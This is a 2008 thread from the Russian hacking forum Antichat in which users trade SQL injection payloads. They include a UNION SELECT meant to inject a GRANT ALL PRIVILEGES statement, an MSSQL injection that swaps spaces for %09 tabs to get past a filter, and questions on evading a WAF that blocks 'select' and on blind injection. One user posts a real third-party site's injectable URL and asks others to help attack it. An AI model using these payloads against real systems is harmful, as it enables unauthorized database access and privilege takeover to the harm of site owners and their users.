ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.01.2008, 19:56
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329
Репутация:
-2
|
|
news.php?id=850+union+select+0,1,2,3,4,GRANT+ALL+P RIVILEGES+ON+*.*+TO+0xek@%+IDENTIFIED+BY+"паро ль"+WITH+GRANT+OPTION,6,7+from+mysql.user/*
таг?) откуда столько Y :PP
|
|
|
18.01.2008, 20:11
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
не получится, если идет select ты никак не проведешь update или любой другой запрос кроме select и union select
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
19.01.2008, 17:42
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме:
38435
Репутация:
5
|
|
Такая проблемка, в MSSQL обычная инъекция /rating.asp?sender=1'
sender при вводе фильтруется на пробел, плюс и дефис. Пробел заменил на таб %09, не знаю что с дефисом сделать. А без него не закомментить ненужную часть запроса,
там остаётся: ' order by blablabla
Другой комент /* выдаёт ошибку, # тоже не коментит =\
Например
Код:
sender=5'%09UNION%09SELECT%09*%09FROM%09INFORMATION_SCHEMA.TABLES%23
вызывает ошибку
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark after the character string ' group by sender'.
т.е. строка получается:
Код:
INFORMATION_SCHEMA.TABLES#' group by sender'.
Можно это как-то обойти? |
|
|
|
19.01.2008, 19:11
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Можно. Просто сделать второй юнион  |
|
|
|
19.01.2008, 19:50
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме:
38435
Репутация:
5
|
|
Сообщение от Macro
Можно. Просто сделать второй юнион пробовал, но ещё бы я знал названия таблиц и колнок 
|
|
|
|
19.01.2008, 20:14
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
Сообщение от PunkAss
пробовал, но ещё бы я знал названия таблиц и колнок Ну information_schema должна быть.
Код:
script.asp?sender=1'%09union%09select%09*%09from%09information_schema.tables%09union%09select%09null
Что-то типа того
|
|
|
|
19.01.2008, 22:24
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме:
38435
Репутация:
5
|
|
Сообщение от Macro
Что-то типа того
Блин, никак не канает 
Узнал по ошибкам, что таблица rating, есть колонки ID и Sender.
Код:
=5'%09UNION%09SELECT%09sender%09FROM%09rating%09WHERE%09'1'='1
ошибка:
Column 'rating.Sender' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
т.е. запрос "SELECT sender FROM rating WHERE '1'='1' group by sender" не канает... хз какой там оригинальный запрос 
|
|
|
|
20.01.2008, 02:20
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
1.Как можно извернуться в случае если фильтруется (хз как назвать) слово select, как только пишешь в запрос
?id=6+union+select
сразу появляется:
Код:
Precondition Failed
The request was not completed due to preconditions that are set in the request header.
Preconditions prevent the requested method from being applied to a resource other than the one intended.
2. И что еще делать если отсутствуют выводимые поля?
Последний раз редактировалось Momiji; 20.01.2008 в 02:24..
|
|
|
|
20.01.2008, 09:43
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
2Momiji
1. Не могу сказать точно, но думаю что на серваке стоит mod_security, если это так, то имхо бесполезно
2. почитай про Blind sql инъекции, на ачате полно статей и ответов на этот вопрос
2PunkAss
имхо фигню делаешь, кроме того что в mssql возможно разделение запросов, ты union select неправильно используешь, да и вобще, если очень надо кидай сюда ссыль посмотрим
__________________
Карфаген должен быть разрушен...
|
|
|
|
20.01.2008, 10:48
|
|
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме:
38435
Репутация:
5
|
|
http://cleverclub.nashe.ru/rating_d.asp?sender=1'
Да вся проблема правильно закончить свой запрос, чтобы в итоге общий был верный. Плохо скуль знаю, научите  |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
